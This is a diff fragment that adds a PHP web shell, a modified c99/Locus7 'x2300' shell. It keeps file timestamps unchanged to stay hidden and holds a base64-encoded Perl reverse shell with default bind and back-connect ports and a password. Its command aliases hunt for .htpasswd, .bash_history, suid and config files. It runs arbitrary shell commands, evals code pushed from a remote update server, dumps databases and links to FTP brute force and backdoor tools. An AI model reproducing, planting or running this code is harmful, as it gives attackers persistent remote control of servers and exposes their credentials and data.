+$filestealth = TRUE; //if TRUE, don't change modify- and access-time 
+
+$donated_html = "<center><b>x2300 Locus7Shell Modified by #!physx^ </b></center>"; 
+/* If you publish free shell and you wish 
+add link to your site or any other information, 
+put here your html. */ 
+$donated_act = array(""); //array ("act1","act2,"...), if $act is in this array, display $donated_html. 
+
+$curdir = "./"; //start folder 
+//$curdir = getenv("DOCUMENT_ROOT"); 
+$tmpdir = ""; //Folder for tempory files. If empty, auto-fill (/tmp or %WINDIR/temp) 
+$tmpdir_log = "./"; //Directory logs of long processes (e.g. brute, scan...) 
+
+$log_email = "user@host.tld"; //Default e-mail for sending logs 
+
+$sort_default = "0a"; //Default sorting, 0 - number of colomn, "a"scending or "d"escending 
+$sort_save = TRUE; //If TRUE then save sorting-position using cookies. 
+
+// Registered file-types. 
+//  array( 
+//   "{action1}"=>array("ext1","ext2","ext3",...), 
+//   "{action2}"=>array("ext4","ext5","ext6",...), 
+//   ... 
+//  ) 
+$ftypes  = array( 
+ "html"=>array("html","htm","shtml"), 
+ "txt"=>array("txt","conf","bat","sh","js","bak","doc","log","sfc","cfg","htaccess"), 
+ "exe"=>array("sh","install","bat","cmd"), 
+ "ini"=>array("ini","inf"), 
+ "code"=>array("php","phtml","php3","php4","inc","tcl","h","c","cpp","py","cgi","pl"), 
+ "img"=>array("gif","png","jpeg","jfif","jpg","jpe","bmp","ico","tif","tiff","avi","mpg","mpeg"), 
+ "sdb"=>array("sdb"), 
+ "phpsess"=>array("sess"), 
+ "download"=>array("exe","com","pif","src","lnk","zip","rar","gz","tar") 
+); 
+
+// Registered executable file-types. 
+//  array( 
+//   string "command{i}"=>array("ext1","ext2","ext3",...), 
+//   ... 
+//  ) 
+//   {command}: %f% = filename 
+$dizin = str_replace("\\",DIRECTORY_SEPARATOR,$dizin); 
+if (empty($dizin)) {$dizin = realpath(".");} elseif(realpath($dizin)) {$dizin = realpath($dizin);} 
+$dizin = str_replace("\\",DIRECTORY_SEPARATOR,$dizin); 
+if (substr($dizin,-1) != DIRECTORY_SEPARATOR) {$dizin .= DIRECTORY_SEPARATOR;} 
+$dizin = str_replace("\\\\","\\",$dizin); 
+$dizinispd = htmlspecialchars($dizin); 
+/*dizin*/ 
+$real = realpath($dizinispd); 
+$path = basename ($PHP_SELF); 
+function dosyayicek($link,$file) 
+{ 
+   $fp = @fopen($link,"r"); 
+   while(!feof($fp)) 
+   { 
+       $cont.= fread($fp,1024); 
+   } 
+   fclose($fp); 
+
+   $fp2 = @fopen($file,"w"); 
+   fwrite($fp2,$cont); 
+   fclose($fp2); 
+} 
+
+
+
+
+$exeftypes  = array( 
+ getenv("PHPRC")." -q %f%" => array("php","php3","php4"), 
+ "perl %f%" => array("pl","cgi") 
+); 
+
+/* Highlighted files. 
+  array( 
+   i=>array({regexp},{type},{opentag},{closetag},{break}) 
+   ... 
+  ) 
+  string {regexp} - regular exp. 
+  int {type}: 
+0 - files and folders (as default), 
+1 - files only, 2 - folders only 
+  string {opentag} - open html-tag, e.g. "<b>" (default) 
+  string {closetag} - close html-tag, e.g. "</b>" (default) 
+  bool {break} - if TRUE and found match then break 
+*/ 
+$regxp_highlight  = array( 
+  array(basename($_SERVER["PHP_SELF"]),1,"<font color=\"yellow\">","</font>"), // example 
+  array("config.php",1) // example 
+); 
+
+$safemode_diskettes = array("a"); // This variable for disabling diskett-errors. 
+ // array (i=>{letter} ...); string {letter} - letter of a drive 
+//$safemode_diskettes = range("a","z"); 
+$hexdump_lines = 8;// lines in hex preview file 
+$hexdump_rows = 24;// 16, 24 or 32 bytes in one line 
+
+$nixpwdperpage = 100; // Get first N lines from /etc/passwd 
+
+$bindport_pass = "c99";  // default password for binding 
+$bindport_port = "31373"; // default port for binding 
+$bc_port = "31373"; // default port for back-connect 
+$datapipe_localport = "8081"; // default port for datapipe 
+$back_connect="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj 
+aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR 
+hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT 
+sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI 
+kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi 
+KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl 
+OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw=="; 
+
+// Command-aliases 
+if (!$win) 
+{ 
+ $cmdaliases = array( 
+  array("-----------------------------------------------------------", "ls -la"), 
+  array("find all suid files", "find / -type f -perm -04000 -ls"), 
+  array("find suid files in current dir", "find . -type f -perm -04000 -ls"), 
+  array("find all sgid files", "find / -type f -perm -02000 -ls"), 
+  array("find sgid files in current dir", "find . -type f -perm -02000 -ls"), 
+  array("find config.inc.php files", "find / -type f -name config.inc.php"), 
+  array("find config* files", "find / -type f -name \"config*\""), 
+  array("find config* files in current dir", "find . -type f -name \"config*\""), 
+  array("find all writable folders and files", "find / -perm -2 -ls"), 
+  array("find all writable folders and files in current dir", "find . -perm -2 -ls"), 
+  array("find all service.pwd files", "find / -type f -name service.pwd"), 
+  array("find service.pwd files in current dir", "find . -type f -name service.pwd"), 
+  array("find all .htpasswd files", "find / -type f -name .htpasswd"), 
+  array("find .htpasswd files in current dir", "find . -type f -name .htpasswd"), 
+  array("find all .bash_history files", "find / -type f -name .bash_history"), 
+  array("find .bash_history files in current dir", "find . -type f -name .bash_history"), 
+  array("find all .fetchmailrc files", "find / -type f -name .fetchmailrc"), 
+  array("find .fetchmailrc files in current dir", "find . -type f -name .fetchmailrc"), 
+  array("list file attributes on a Linux second extended file system", "lsattr -va"), 
+  array("show opened ports", "netstat -an | grep -i listen") 
+ ); 
+} 
+else 
+{ 
+ $cmdaliases = array( 
+  array("-----------------------------------------------------------", "dir"), 
+  array("show opened ports", "netstat -an") 
+ ); 
+} 
+
+$sess_cookie = "c99shvars"; // Cookie-variable name 
+
+$usefsbuff = TRUE; //Buffer-function 
+$copy_unset = FALSE; //Remove copied files from buffer after pasting 
+
+//Quick launch 
+$quicklaunch = array( 
+ array("<img src=\"".$surl."act=img&img=home\" alt=\"Home\" height=\"20\" width=\"20\" border=\"0\">",$surl), 
+ array("<img src=\"".$surl."act=img&img=back\" alt=\"Back\" height=\"20\" width=\"20\" border=\"0\">","#\" onclick=\"history.back(1)"), 
+ array("<img src=\"".$surl."act=img&img=forward\" alt=\"Forward\" height=\"20\" width=\"20\" border=\"0\">","#\" onclick=\"history.go(1)"), 
+ array("<img src=\"".$surl."act=img&img=up\" alt=\"UPDIR\" height=\"20\" width=\"20\" border=\"0\">",$surl."act=ls&d=%upd&sort=%sort"), 
+ array("<img src=\"".$surl."act=img&img=refresh\" alt=\"Refresh\" height=\"20\" width=\"17\" border=\"0\">",""), 
+ array("<img src=\"".$surl."act=img&img=search\" alt=\"Search\" height=\"20\" width=\"20\" border=\"0\">",$surl."act=search&d=%d"), 
+ array("<img src=\"".$surl."act=img&img=buffer\" alt=\"Buffer\" height=\"20\" width=\"20\" border=\"0\">",$surl."act=fsbuff&d=%d"), 
+ array("<br><center><b>[Enumerate]</b>",$enumerate),
+ array("<b>[Encoder]</b>",$surl."act=encoder&d=%d"), 
+ array("<b>[Tools]</b>",$surl."act=tools&d=%d"), 
+ array("<b>[Proc.]</b>",$surl."act=processes&d=%d"), 
+ array("<b>[FTP Brute]</b>",$surl."act=ftpquickbrute&d=%d"), 
+ array("<b>[Sec.]</b>",$surl."act=security&d=%d"), 
+ array("<b>[SQL]</b>",$surl."act=sql&d=%d"), 
+ array("<b>[PHP-Code]</b>",$surl."act=eval&d=%d"), 
+ array("<b>[Backdoor Host]</b>",$surl."act=shbd"),
+ array("<b>[Back-Connection]</b>",$surl."act=backc"), 
+ array("<b>[milw0rm it!]</b>",$millink),
+ array("<b>[PHP-Proxy]</b>",$phprox),
+ array("<b>[Self remove]</b></center>",$surl."act=selfremove")
+); 
+
+//Highlight-code colors 
+$highlight_background = "#c0c0c0"; 
+$highlight_bg = "#FFFFFF"; 
+$highlight_comment = "#6A6A6A"; 
+$highlight_default = "#0000BB"; 
+$highlight_html = "#1300FF"; 
+$highlight_keyword = "#007700"; 
+$highlight_string = "#000000"; 
+
+@$f = $_REQUEST["f"]; 
+@extract($_REQUEST["c99shcook"]); 
+
+//END CONFIGURATION 
+
+
+// \/Next code isn't for editing\/ 
+/*function ex($cfe) 
+{ 
+ $res = ''; 
+ if (!empty($cfe)) 
+ { 
+  if(function_exists('exec')) 
+   { 
+    @exec($cfe,$res); 
+    $res = join("\n",$res); 
+   } 
+  elseif(function_exists('shell_exec')) 
+   { 
+    $res = @shell_exec($cfe); 
+   } 
+  elseif(function_exists('system')) 
+   { 
+    @ob_start(); 
+    @system($cfe); 
+    $res = @ob_get_contents(); 
+    @ob_end_clean(); 
+   } 
+  elseif(function_exists('passthru')) 
+   { 
+    @ob_start(); 
+    @passthru($cfe); 
+    $res = @ob_get_contents(); 
+    @ob_end_clean(); 
+   } 
+  elseif(@is_resource($f = @popen($cfe,"r"))) 
+  { 
+   $res = ""; 
+   while(!@feof($f)) { $res .= @fread($f,1024); } 
+   @pclose($f); 
+  } 
+ } 
+ return $res; 
+}*/
+/*function which($pr) 
+{ 
+$path = ex("which $pr"); 
+if(!empty($path)) { return $path; } else { return $pr; } 
+} 
+
+function cf($fname,$text) 
+{ 
+ $w_file=@fopen($fname,"w") or err(0); 
+ if($w_file) 
+ { 
+ @fputs($w_file,@base64_decode($text)); 
+ @fclose($w_file); 
+ } 
+}*/ 
+/*function err($n,$txt='') 
+{ 
+echo '<table width=100% cellpadding=0 cellspacing=0><tr><td bgcolor=#000000><font color=red face=Verdana size=-2><div align=center><b>';     
+echo $GLOBALS['lang'][$GLOBALS['language'].'_err'.$n]; 
+if(!empty($txt)) { echo " $txt"; } 
+echo '</b></div></font></td></tr></table>'; 
+return null; 
+}*/
+@set_time_limit(0); 
+$tmp = array(); 
+foreach($host_allow as $k=>$v) {$tmp[] = str_replace("\\*",".*",preg_quote($v));} 
+$s = "!^(".implode("|",$tmp).")$!i"; 
+if (!preg_match($s,getenv("REMOTE_ADDR")) and !preg_match($s,gethostbyaddr(getenv("REMOTE_ADDR")))) {exit("<a href=\"http://locus7s.com/\">x2300 Shell</a>: Access Denied - your host (".getenv("REMOTE_ADDR").") not allow");} 
+if (!empty($login)) 
+{ 
+ if (empty($md5_pass)) {$md5_pass = md5($pass);} 
+ if (($_SERVER["PHP_AUTH_USER"] != $login) or (md5($_SERVER["PHP_AUTH_PW"]) != $md5_pass)) 
+ { 
+  if (empty($login_txt)) {$login_txt = strip_tags(ereg_replace("&nbsp;|<br>"," ",$donated_html));} 
+  header("WWW-Authenticate: Basic realm=\"c99shell ".$shver.": ".$login_txt."\""); 
+  header("HTTP/1.0 401 Unauthorized"); 
+  exit($accessdeniedmess); 
+ } 
+} 
+if ($act != "img") 
+{ 
+$lastdir = realpath("."); 
+chdir($curdir); 
+if ($selfwrite or $updatenow) {@ob_clean(); c99sh_getupdate($selfwrite,1); exit;} 
+$sess_data = unserialize($_COOKIE["$sess_cookie"]); 
+if (!is_array($sess_data)) {$sess_data = array();} 
+if (!is_array($sess_data["copy"])) {$sess_data["copy"] = array();} 
+if (!is_array($sess_data["cut"])) {$sess_data["cut"] = array();} 
+
+$disablefunc = @ini_get("disable_functions"); 
+if (!empty($disablefunc)) 
+{ 
+ $disablefunc = str_replace(" ","",$disablefunc); 
+ $disablefunc = explode(",",$disablefunc); 
+} 
+
+if (!function_exists("c99_buff_prepare")) 
+{ 
+function c99_buff_prepare() 
+{ 
+ global $sess_data; 
+ global $act; 
+ foreach($sess_data["copy"] as $k=>$v) {$sess_data["copy"][$k] = str_replace("\\",DIRECTORY_SEPARATOR,realpath($v));} 
+ foreach($sess_data["cut"] as $k=>$v) {$sess_data["cut"][$k] = str_replace("\\",DIRECTORY_SEPARATOR,realpath($v));} 
+ $sess_data["copy"] = array_unique($sess_data["copy"]); 
+ $sess_data["cut"] = array_unique($sess_data["cut"]); 
+ sort($sess_data["copy"]); 
+ sort($sess_data["cut"]); 
+ if ($act != "copy") {foreach($sess_data["cut"] as $k=>$v) {if ($sess_data["copy"][$k] == $v) {unset($sess_data["copy"][$k]); }}} 
+ else {foreach($sess_data["copy"] as $k=>$v) {if ($sess_data["cut"][$k] == $v) {unset($sess_data["cut"][$k]);}}} 
+} 
+} 
+c99_buff_prepare(); 
+
+if (!function_exists("c99_sess_put")) 
+{ 
+function c99_sess_put($data) 
+{ 
+ global $sess_cookie; 
+ global $sess_data; 
+ c99_buff_prepare(); 
+ $sess_data = $data; 
+ $data = serialize($data); 
+ setcookie($sess_cookie,$data); 
+} 
+} 
+foreach (array("sort","sql_sort") as $v) 
+{ 
+ if (!empty($_GET[$v])) {$$v = $_GET[$v];} 
+ if (!empty($_POST[$v])) {$$v = $_POST[$v];} 
+} 
+if ($sort_save) 
+{ 
+ if (!empty($sort)) {setcookie("sort",$sort);} 
+ if (!empty($sql_sort)) {setcookie("sql_sort",$sql_sort);} 
+} 
+if (!function_exists("str2mini")) 
+{ 
+function str2mini($content,$len) 
+{ 
+ if (strlen($content) > $len) 
+ { 
+  $len = ceil($len/2) - 2; 
+  return substr($content, 0,$len)."...".substr($content,-$len); 
+ } 
+ else {return $content;} 
+} 
+} 
+if (!function_exists("view_size")) 
+{ 
+function view_size($size) 
+{ 
+ if (!is_numeric($size)) {return FALSE;} 
+ else 
+ { 
+  if ($size >= 1073741824) {$size = round($size/1073741824*100)/100 ." GB";} 
+  elseif ($size >= 1048576) {$size = round($size/1048576*100)/100 ." MB";} 
+  elseif ($size >= 1024) {$size = round($size/1024*100)/100 ." KB";} 
+  else {$size = $size . " B";} 
+  return $size; 
+ } 
+} 
+} 
+if (!function_exists("fs_copy_dir")) 
+{ 
+function fs_copy_dir($d,$t) 
+{ 
+ $d = str_replace("\\",DIRECTORY_SEPARATOR,$d); 
+ if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;} 
+ $h = opendir($d); 
+ while (($o = readdir($h)) !== FALSE) 
+ { 
+  if (($o != ".") and ($o != "..")) 
+  { 
+   if (!is_dir($d.DIRECTORY_SEPARATOR.$o)) {$ret = copy($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o);} 
+   else {$ret = mkdir($t.DIRECTORY_SEPARATOR.$o); fs_copy_dir($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o);} 
+   if (!$ret) {return $ret;} 
+  } 
+ } 
+ closedir($h); 
+ return TRUE; 
+} 
+} 
+if (!function_exists("fs_copy_obj")) 
+{ 
+function fs_copy_obj($d,$t) 
+{ 
+ $d = str_replace("\\",DIRECTORY_SEPARATOR,$d); 
+ $t = str_replace("\\",DIRECTORY_SEPARATOR,$t); 
+ if (!is_dir(dirname($t))) {mkdir(dirname($t));} 
+ if (is_dir($d)) 
+ { 
+  if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;} 
+  if (substr($t,-1) != DIRECTORY_SEPARATOR) {$t .= DIRECTORY_SEPARATOR;} 
+  return fs_copy_dir($d,$t); 
+ } 
+ elseif (is_file($d)) {return copy($d,$t);} 
+ else {return FALSE;} 
+} 
+} 
+if (!function_exists("fs_move_dir")) 
+{ 
+function fs_move_dir($d,$t) 
+{ 
+ $h = opendir($d); 
+ if (!is_dir($t)) {mkdir($t);} 
+ while (($o = readdir($h)) !== FALSE) 
+ { 
+  if (($o != ".") and ($o != "..")) 
+  { 
+   $ret = TRUE; 
+   if (!is_dir($d.DIRECTORY_SEPARATOR.$o)) {$ret = copy($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o);} 
+   else {if (mkdir($t.DIRECTORY_SEPARATOR.$o) and fs_copy_dir($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o)) {$ret = FALSE;}} 
+   if (!$ret) {return $ret;} 
+  } 
+ } 
+ closedir($h); 
+ return TRUE; 
+} 
+} 
+if (!function_exists("fs_move_obj")) 
+{ 
+function fs_move_obj($d,$t) 
+{ 
+ $d = str_replace("\\",DIRECTORY_SEPARATOR,$d); 
+ $t = str_replace("\\",DIRECTORY_SEPARATOR,$t); 
+ if (is_dir($d)) 
+ { 
+  if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;} 
+  if (substr($t,-1) != DIRECTORY_SEPARATOR) {$t .= DIRECTORY_SEPARATOR;} 
+  return fs_move_dir($d,$t); 
+ } 
+ elseif (is_file($d)) 
+ { 
+  if(copy($d,$t)) {return unlink($d);} 
+  else {unlink($t); return FALSE;} 
+ } 
+ else {return FALSE;} 
+} 
+} 
+if (!function_exists("fs_rmdir")) 
+{ 
+function fs_rmdir($d) 
+{ 
+ $h = opendir($d); 
+ while (($o = readdir($h)) !== FALSE) 
+ { 
+  if (($o != ".") and ($o != "..")) 
+  { 
+   if (!is_dir($d.$o)) {unlink($d.$o);} 
+   else {fs_rmdir($d.$o.DIRECTORY_SEPARATOR); rmdir($d.$o);} 
+  } 
+ } 
+ closedir($h); 
+ rmdir($d); 
+ return !is_dir($d); 
+} 
+} 
+if (!function_exists("fs_rmobj")) 
+{ 
+function fs_rmobj($o) 
+{ 
+ $o = str_replace("\\",DIRECTORY_SEPARATOR,$o); 
+ if (is_dir($o)) 
+ { 
+  if (substr($o,-1) != DIRECTORY_SEPARATOR) {$o .= DIRECTORY_SEPARATOR;} 
+  return fs_rmdir($o); 
+ } 
+ elseif (is_file($o)) {return unlink($o);} 
+ else {return FALSE;} 
+} 
+} 
+if (!function_exists("myshellexec")) 
+{ 
+function myshellexec($cmd) 
+{ 
+ global $disablefunc; 
+ $result = ""; 
+ if (!empty($cmd)) 
+ { 
+  if (is_callable("exec") and !in_array("exec",$disablefunc)) {exec($cmd,$result); $result = join("\n",$result);} 
+  elseif (($result = `$cmd`) !== FALSE) {} 
+  elseif (is_callable("system") and !in_array("system",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); system($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;} 
+  elseif (is_callable("passthru") and !in_array("passthru",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); passthru($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;} 
+  elseif (is_resource($fp = popen($cmd,"r"))) 
+  { 
+   $result = ""; 
+   while(!feof($fp)) {$result .= fread($fp,1024);} 
+   pclose($fp); 
+  } 
+ } 
+ return $result; 
+} 
+} 
+if (!function_exists("tabsort")) {function tabsort($a,$b) {global $v; return strnatcmp($a[$v], $b[$v]);}} 
+if (!function_exists("view_perms")) 
+{ 
+function view_perms($mode) 
+{ 
+ if (($mode & 0xC000) === 0xC000) {$type = "s";} 
+ elseif (($mode & 0x4000) === 0x4000) {$type = "d";} 
+ elseif (($mode & 0xA000) === 0xA000) {$type = "l";} 
+ elseif (($mode & 0x8000) === 0x8000) {$type = "-";} 
+ elseif (($mode & 0x6000) === 0x6000) {$type = "b";} 
+ elseif (($mode & 0x2000) === 0x2000) {$type = "c";} 
+ elseif (($mode & 0x1000) === 0x1000) {$type = "p";} 
+ else {$type = "?";} 
+
+ $owner["read"] = ($mode & 00400)?"r":"-"; 
+ $owner["write"] = ($mode & 00200)?"w":"-"; 
+ $owner["execute"] = ($mode & 00100)?"x":"-"; 
+ $group["read"] = ($mode & 00040)?"r":"-"; 
+ $group["write"] = ($mode & 00020)?"w":"-"; 
+ $group["execute"] = ($mode & 00010)?"x":"-"; 
+ $world["read"] = ($mode & 00004)?"r":"-"; 
+ $world["write"] = ($mode & 00002)? "w":"-"; 
+ $world["execute"] = ($mode & 00001)?"x":"-"; 
+
+ if ($mode & 0x800) {$owner["execute"] = ($owner["execute"] == "x")?"s":"S";} 
+ if ($mode & 0x400) {$group["execute"] = ($group["execute"] == "x")?"s":"S";} 
+ if ($mode & 0x200) {$world["execute"] = ($world["execute"] == "x")?"t":"T";} 
+
+ return $type.join("",$owner).join("",$group).join("",$world); 
+} 
+} 
+if (!function_exists("posix_getpwuid") and !in_array("posix_getpwuid",$disablefunc)) {function posix_getpwuid($uid) {return FALSE;}} 
+if (!function_exists("posix_getgrgid") and !in_array("posix_getgrgid",$disablefunc)) {function posix_getgrgid($gid) {return FALSE;}} 
+if (!function_exists("posix_kill") and !in_array("posix_kill",$disablefunc)) {function posix_kill($gid) {return FALSE;}} 
+if (!function_exists("parse_perms")) 
+{ 
+function parse_perms($mode) 
+{ 
+ if (($mode & 0xC000) === 0xC000) {$t = "s";} 
+ elseif (($mode & 0x4000) === 0x4000) {$t = "d";} 
+ elseif (($mode & 0xA000) === 0xA000) {$t = "l";} 
+ elseif (($mode & 0x8000) === 0x8000) {$t = "-";} 
+ elseif (($mode & 0x6000) === 0x6000) {$t = "b";} 
+ elseif (($mode & 0x2000) === 0x2000) {$t = "c";} 
+ elseif (($mode & 0x1000) === 0x1000) {$t = "p";} 
+ else {$t = "?";} 
+ $o["r"] = ($mode & 00400) > 0; $o["w"] = ($mode & 00200) > 0; $o["x"] = ($mode & 00100) > 0; 
+ $g["r"] = ($mode & 00040) > 0; $g["w"] = ($mode & 00020) > 0; $g["x"] = ($mode & 00010) > 0; 
+ $w["r"] = ($mode & 00004) > 0; $w["w"] = ($mode & 00002) > 0; $w["x"] = ($mode & 00001) > 0; 
+ return array("t"=>$t,"o"=>$o,"g"=>$g,"w"=>$w); 
+} 
+} 
+if (!function_exists("parsesort")) 
+{ 
+function parsesort($sort) 
+{ 
+ $one = intval($sort); 
+ $second = substr($sort,-1); 
+ if ($second != "d") {$second = "a";} 
+ return array($one,$second); 
+} 
+} 
+if (!function_exists("view_perms_color")) 
+{ 
+function view_perms_color($o) 
+{ 
+ if (!is_readable($o)) {return "<font color=red>".view_perms(fileperms($o))."</font>";} 
+ elseif (!is_writable($o)) {return "<font color=white>".view_perms(fileperms($o))."</font>";} 
+ else {return "<font color=green>".view_perms(fileperms($o))."</font>";} 
+} 
+} 
+if (!function_exists("c99getsource")) 
+{ 
+function c99getsource($fn) 
+{ 
+ global $c99sh_sourcesurl; 
+ $array = array( 
+  "c99sh_bindport.pl" => "c99sh_bindport_pl.txt", 
+  "c99sh_bindport.c" => "c99sh_bindport_c.txt", 
+  "c99sh_backconn.pl" => "c99sh_backconn_pl.txt", 
+  "c99sh_backconn.c" => "c99sh_backconn_c.txt", 
+  "c99sh_datapipe.pl" => "c99sh_datapipe_pl.txt", 
+  "c99sh_datapipe.c" => "c99sh_datapipe_c.txt", 
+ ); 
+ $name = $array[$fn]; 
+ if ($name) {return file_get_contents($c99sh_sourcesurl.$name);} 
+ else {return FALSE;} 
+} 
+} 
+if (!function_exists("c99sh_getupdate")) 
+{ 
+function c99sh_getupdate($update = TRUE) 
+{ 
+ $url = $GLOBALS["c99sh_updateurl"]."?version=".urlencode(base64_encode($GLOBALS["shver"]))."&updatenow=".($updatenow?"1":"0")."&"; 
+ $data = @file_get_contents($url); 
+ if (!$data) {return "Can't connect to update-server!";} 
+ else 
+ { 
+  $data = ltrim($data); 
+  $string = substr($data,3,ord($data{2})); 
+  if ($data{0} == "\x99" and $data{1} == "\x01") {return "Error: ".$string; return FALSE;} 
+  if ($data{0} == "\x99" and $data{1} == "\x02") {return "You are using latest version!";} 
+  if ($data{0} == "\x99" and $data{1} == "\x03") 
+  { 
+   $string = explode("\x01",$string); 
+   if ($update) 
+   { 
+    $confvars = array(); 
+    $sourceurl = $string[0]; 
+    $source = file_get_contents($sourceurl); 
+    if (!$source) {return "Can't fetch update!";} 
+    else 
+    { 
+     $fp = fopen(__FILE__,"w"); 
+     if (!$fp) {return "Local error: can't write update to ".__FILE__."! You may download c99shell.php manually <a href=\"".$sourceurl."\"><u>here</u></a>.";} 
+     else {fwrite($fp,$source); fclose($fp); return "Thanks! Updated with success.";} 
+    } 
+   } 
+   else {return "New version are available: ".$string[1];} 
+  } 
+  elseif ($data{0} == "\x99" and $data{1} == "\x04") {eval($string); return 1;} 
+  else {return "Error in protocol: segmentation failed! (".$data.") ";} 
+ } 
+} 
+} 
+if (!function_exists("mysql_dump")) 
+{ 
+function mysql_dump($set) 
+{ 
+ global $shver; 
+ $sock = $set["sock"]; 
+ $db = $set["db"]; 
+ $print = $set["print"]; 
+ $nl2br = $set["nl2br"]; 
+ $file = $set["file"]; 
+ $add_drop = $set["add_drop"]; 
+ $tabs = $set["tabs"]; 
+ $onlytabs = $set["onlytabs"]; 
+ $ret = array(); 
+ $ret["err"] = array(); 
+ if (!is_resource($sock)) {echo("Error: \$sock is not valid resource.");} 
+ if (empty($db)) {$db = "db";} 
+ if (empty($print)) {$print = 0;} 
+ if (empty($nl2br)) {$nl2br = 0;} 
+ if (empty($add_drop)) {$add_drop = TRUE;} 
+ if (empty($file)) 
+ { 
+  $file = $tmpdir."dump_".getenv("SERVER_NAME")."_".$db."_".date("d-m-Y-H-i-s").".sql"; 
+ } 
+ if (!is_array($tabs)) {$tabs = array();} 
+ if (empty($add_drop)) {$add_drop = TRUE;} 
+ if (sizeof($tabs) == 0) 
+ { 
+  // retrive tables-list 
+  $res = mysql_query("SHOW TABLES FROM ".$db, $sock); 
+  if (mysql_num_rows($res) > 0) {while ($row = mysql_fetch_row($res)) {$tabs[] = $row[0];}} 
+ } 
+ $out = "# Dumped by Locous7Shell.SQL v. ".$shver." 
+# Home page: http://www.Locus7s.com 
+# 
+# Host settings: 
+# MySQL version: (".mysql_get_server_info().") running on ".getenv("SERVER_ADDR")." (".getenv("SERVER_NAME").")"." 
+# Date: ".date("d.m.Y H:i:s")." 
+# DB: \"".$db."\" 
+#--------------------------------------------------------- 
+"; 
+ $c = count($onlytabs); 
+ foreach($tabs as $tab) 
+ { 
+  if ((in_array($tab,$onlytabs)) or (!$c)) 
+  { 
+   if ($add_drop) {$out .= "DROP TABLE IF EXISTS `".$tab."`;\n";} 
+   // recieve query for create table structure 
+   $res = mysql_query("SHOW CREATE TABLE `".$tab."`", $sock); 
+   if (!$res) {$ret["err"][] = mysql_smarterror();} 
+   else 
+   { 
+    $row = mysql_fetch_row($res); 
+    $out .= $row["1"].";\n\n"; 
+    // recieve table variables 
+    $res = mysql_query("SELECT * FROM `$tab`", $sock); 
+    if (mysql_num_rows($res) > 0) 
+    { 
+     while ($row = mysql_fetch_assoc($res)) 
+     { 
+      $keys = implode("`, `", array_keys($row)); 
+      $values = array_values($row); 
+      foreach($values as $k=>$v) {$values[$k] = addslashes($v);} 
+      $values = implode("', '", $values); 
+      $sql = "INSERT INTO `$tab`(`".$keys."`) VALUES ('".$values."');\n"; 
+      $out .= $sql; 
+     } 
+    } 
+   } 
+  } 
+ } 
+ $out .= "#---------------------------------------------------------------------------------\n\n"; 
+ if ($file) 
+ { 
+  $fp = fopen($file, "w"); 
+  if (!$fp) {$ret["err"][] = 2;} 
+  else 
+  { 
+   fwrite ($fp, $out); 
+   fclose ($fp); 
+  } 
+ } 
+ if ($print) {if ($nl2br) {echo nl2br($out);} else {echo $out;}} 
+ return $out; 
+} 
+} 
+if (!function_exists("mysql_buildwhere")) 
+{ 
+function mysql_buildwhere($array,$sep=" and",$functs=array()) 
+{ 
+ if (!is_array($array)) {$array = array();} 
+ $result = ""; 
+ foreach($array as $k=>$v) 
+ { 
+  $value = ""; 
+  if (!empty($functs[$k])) {$value .= $functs[$k]."(";} 
+  $value .= "'".addslashes($v)."'"; 
+  if (!empty($functs[$k])) {$value .= ")";} 
+  $result .= "`".$k."` = ".$value.$sep; 
+ } 
+ $result = substr($result,0,strlen($result)-strlen($sep)); 
+ return $result; 
+} 
+} 
+if (!function_exists("mysql_fetch_all")) 
+{ 
+function mysql_fetch_all($query,$sock) 
+{ 
+ if ($sock) {$result = mysql_query($query,$sock);} 
+ else {$result = mysql_query($query);} 
+ $array = array(); 
+ while ($row = mysql_fetch_array($result)) {$array[] = $row;} 
+ mysql_free_result($result); 
+ return $array; 
+} 
+} 
+if (!function_exists("mysql_smarterror")) 
+{ 
+function mysql_smarterror($type,$sock) 
+{ 
+ if ($sock) {$error = mysql_error($sock);} 
+ else {$error = mysql_error();} 
+ $error = htmlspecialchars($error); 
+ return $error; 
+} 
+} 
+if (!function_exists("mysql_query_form")) 
+{ 
+function mysql_query_form() 
+{ 
+ global $submit,$sql_act,$sql_query,$sql_query_result,$sql_confirm,$sql_query_error,$tbl_struct; 
+ if (($submit) and (!$sql_query_result) and ($sql_confirm)) {if (!$sql_query_error) {$sql_query_error = "Query was empty";} echo "<b>Error:</b> <br>".$sql_query_error."<br>";} 
+ if ($sql_query_result or (!$sql_confirm)) {$sql_act = $sql_goto;} 
+ if ((!$submit) or ($sql_act)) 
+ { 
